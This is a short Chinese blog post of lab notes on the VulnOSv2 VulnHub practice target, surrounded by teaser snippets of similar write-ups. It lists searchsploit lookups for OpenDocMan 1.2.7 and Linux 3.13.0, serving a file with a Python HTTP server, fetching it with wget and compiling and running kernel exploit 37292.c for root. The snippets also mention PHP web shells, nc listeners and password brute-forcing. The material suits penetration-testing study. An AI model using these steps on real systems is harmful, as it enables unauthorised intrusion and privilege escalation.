Vulnosv2 靶机训练

最新推荐文章于 2024-03-05 17:40:34 发布
最新推荐文章于 2024-03-05 17:40:34 发布
阅读量224 收藏
点赞数
分类专栏: 靶机练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43999483/article/details/114283861
版权

参考博客传送门

关键点:web系统可能在msf中保留有漏洞记录,找到相对应的版本攻击点进行攻击

searchsploit OpenDocMan 1.2.7

一般存放目录都放在

/usr/share/exploitdb下面

获得低权限用户后 可以考虑Linux内核提权

searchsploit Linux 3.13.0

搭建一个文件服务器

python -m SimpleHTTPServer 6666

下载

wget http://xxx.xxx.xxx.xxx

如果是c类型文件,需要gcc编译
找到gcc

whereis gcc

gcc /usr/bin/gcc -o abc 37292.c

将编译后的文件保存再abc中
调高abc文件权限 chmod
./abc运行该payload 内核提权成功

M@gic_P1g
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub2
willow_liang的博客
01-30 171
目录 fristileaks-13,133 1.查找靶机ip 2.端口扫描 3.查看web界面 4.上传一个rever.php.gif的shell,nc进行监听。 5.登录admin账号 6.提权 stapler-1,150 1.端口扫描 2.尝试登录ftp,ftp允许匿名登录,下载note文件,发现两个用户名elly和john 3.访问12380的web服务 4.使用wpscan扫描 5.使用该exp查找wordpress的配置文件 6.登录phpmyadmin 使用j.
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix2-WalkThrough 靶机复现 本文将对 Kioptrix2 靶机复现的整个过程进行详细的知识点总结,涵盖信息收集、攻击、提权等阶段的关键技术点。 信息收集阶段 在信息收集阶段,我们首先需要对靶机进行 IP 探活,...
Vulnhub-靶机-VulnOSv2
qq_43264813的博客
03-01 460
Vulnhub—靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 文章目录Vulnhub—靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.43.0/24 【步骤二】对目标靶机进行全端口扫描: 【命令】nmap -n -sC -sV -p- 192.1
Vulnhub系列:VulnOSv2
Ays.Ie的博客
03-05 457
继续更新vulnhub的靶机,巩固渗透技术,分享做题思路,打开思维局限
vulnhub靶场vulnosv2靶场
zzzzzzkeai的博客
12-08 199
vulnhub靶场--vulnosv2靶场
渗透测试靶机----VulnOsv2
久恙502的博客
01-29 412
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
oscp推荐的训练靶机raven2渗透过程
07-05
OSCP 训练靶机 Raven2 渗透过程详解 OSCP( Offensive Security Certified Professional)是 Offensive Security 公司提供的渗透测试认证,旨在验证个人的渗透测试技能。Raven2 是 OSCP 认证考试中的一个训练靶机,...
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
PWN靶机环境 网络安全
05-23
PWN靶机环境
docker-opendocman-fullstack:使用图的全栈 OpenDocMan docker 集群
07-03
#Docker OpenDocMan 全栈与 MySQL 使用图 1 的全栈 OpenDocMan docker 集群 如果您正在寻找预构建的 docker 镜像,请看这里: 此存储库包含构建运行最新版本 OpenDocMan、Apache 2、PHP(容器 1)、MySQL(容器 2)和文件存储(容器 3)的 docker 三容器集群所需的文件。 ###构建您的集群: (需要 docker 客户端(Mac 需要 boot2docker)、 和 docker 主机) “图 -d” 然后你应该有一个正在运行的实例,如果你访问你的容器 IP 地址,你将看到一个管理员登录(管理员/无密码)。 登录后更改管理员密码。 只要不删除文件存储容器,您的数据将被无限存储,包括您的文件数据目录和您的 mysql 数据库文件。
OpenDocMan:PHP文档管理系统(DMS)-开源
04-25
OpenDocMan是一个用PHP编写的基于Web的文档管理系统(DMS),旨在符合ISO 17025和OIE文档管理标准。 它具有对文件访问的细粒度控制以及自动安装和升级的功能。
文档管理系统(DMS)V1.1.rar
06-14
优质个人文档管理系统. 文档管理: 文档检索: 文件夹加密: 文件夹目录调整: 文档目录调整: 附件管理: 标题检测: 与Word的导入导出: 自动同步: 等功能要点..
在docker上安装运行mysql实例
09-09
Docker 使用 Google 公司推出的 Go 语言 进行开发实现,基于 Linux 内核的 cgroup,namespace,以及 AUFS 类的 Union FS 等技术,对进程进行封装隔离,属于操作系统层面的虚拟化技术。
VulnHub靶机-VulnOs-2
Slow_的博客
02-24 626
VulnHub靶机-VulnOs-2 下载地址:https://www.vulnhub.com/entry/vulnos-2,147/ 下载靶机后在VirtualBox下打开,网卡配置为桥接 任务:提权并获取flag 攻击机:kali linux 192.168.8.108 靶机:192.168.8.107 文章目录VulnHub靶机-VulnOs-2一、信息搜集一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 一、信息搜集 首先nmap探测存活靶机 命令:nmap -sP 192.168.8
【甄选靶场】Vulnhub百个项目渗透——项目十四:VulOsv2(CMS利用,工控文件发掘)
人间体佐菲的博客
09-16 849
网络安全,信息安全,网络空间安全,渗透测试
Vulnhub 靶机 VulnOSv2 write up opendocman cms 32075 sql注入 账号密码 ssh连接 37292.c 脏牛提权
YouthBelief的博客
12-05 2274
VulnOSv2 write up0x00 环境搭建0x01 信息收集0x02 漏洞挖掘web思路步骤一:枚举目录+主页挖掘步骤二:OpenDocMan v1.2.7 cms利用步骤三:尝试利用账号面ssh连接webmin0x03 提权步骤四:内核漏洞提权0x04 总结 0x00 环境搭建 VritualBox配置网络为 host-only VMware中kali加入 host-only 为Virtual Box的网卡 开启虚拟机报错 usb 2.0 什么的问题 修改usb设备为1.0 0x01 信息
vulnhub VulnOS: 2
箭雨镜屋
12-05 2538
本文思路:nmap端口扫描-->访问网站搜集信息-->利用OpenDocMan v1.2.7的sql注入漏洞获取webmin用户的密码-->webmin用户ssh登录搜集信息-->利用内核版本漏洞提权(或者 爆破postgresql用户名密码-->postgresql中获得vulnosadmin的密码-->通过vulnosadmin用户目录下的r00t.blend文件获得root用户密码)
VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习
最新发布
jockerboss的博客
03-05 896
VulnOS靶场练习详解&安装&必练靶场&渗透靶场练习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值